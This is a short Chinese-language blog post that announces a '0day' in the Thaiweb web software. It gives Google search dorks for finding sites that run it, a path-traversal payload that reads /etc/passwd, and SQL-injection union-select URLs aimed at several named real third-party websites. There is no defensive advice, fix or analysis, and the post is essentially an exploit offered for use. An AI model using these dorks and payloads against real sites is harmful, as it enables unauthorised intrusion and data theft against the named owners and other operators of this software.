当前位置: iick's blog > 网站漏洞 > Thaiweb远程文件sql注入漏洞0day

Thaiweb远程文件sql注入漏洞0day

作者:hack1990 时间:12-12-28 阅读数:1316人阅读

Google之:

intext:powered by Thaiweb

inurl:index.php?page=board.php

 

利用点1:http://www.iick.blog/index.php?page=../../../../../../../../../../../../../etc/passwd

 

利用点2:http://www.iick.blog/index.php?page=boardque.php&bod_id=4'

 

http://www.keytasin.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--

http://www.autopartnerthailand.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
 
http://gift.in.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
 

# Nmap Security Scanner 7.0

上一篇:WordPress Asset-Manager PHP文件上传漏洞

下一篇:ECShop全版本注入0day

相关文章

发表评论